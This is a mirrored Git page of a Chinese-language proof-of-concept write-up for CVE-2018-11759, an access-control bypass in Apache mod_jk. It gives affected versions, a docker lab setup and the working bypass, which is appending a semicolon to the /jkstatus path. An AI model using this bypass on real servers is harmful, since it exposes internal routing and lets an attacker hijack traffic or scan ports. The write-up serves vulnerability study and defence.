admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Mod_jk 访问控制权限绕过 CVE-2018-11759.md
Threekiii a1b514a449 Web服务器漏洞
2022-02-21 10:26:43 +08:00

45 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Mod_jk 访问控制权限绕过 CVE-2018-11759
## 漏洞描述
Apache Tomcat JKmod_jkConnector是美国阿帕奇Apache软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块用以为Apache或IIS服务器提供处理JSP/Servlet的能力。
由于httpd和Tomcat在路径处理规范上存在差异因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版本上由JkMount httpd指令所定义端点的访问控制限制。
如果一个只有只读权限的jkstatus的接口可以访问的话那么就有可能能够公开由mod_jk模块给AJP提供服务的内部路由。
如果一个具有读写权限的jkstatus接口可供访问我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量又或者进行内部的端口扫描。
## 影响版本
```
Apache Mod_jk Connector 1.2.0 ~ 1.2.44
```
## 环境搭建
```plain
git clone https://github.com/immunIT/CVE-2018-11759.git
docker-conpose up -d
```
访问 http://xxx.xxx.xxx.xxx:80 成功即可
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090041136.png)
## 漏洞复现
访问 http://xxx.xxx.xxx.xxx/jkstatus 显示无权限访问
```plain
Forbidden
You don't have permission to access /jkstatus on this server.
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090041216.png)
访问 http://xxx.xxx.xxx.xxx/jkstatus; 即可绕过
- 注意是在url后面加上了一个;
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090042251.png)
Reference in New Issue View Git Blame Copy Permalink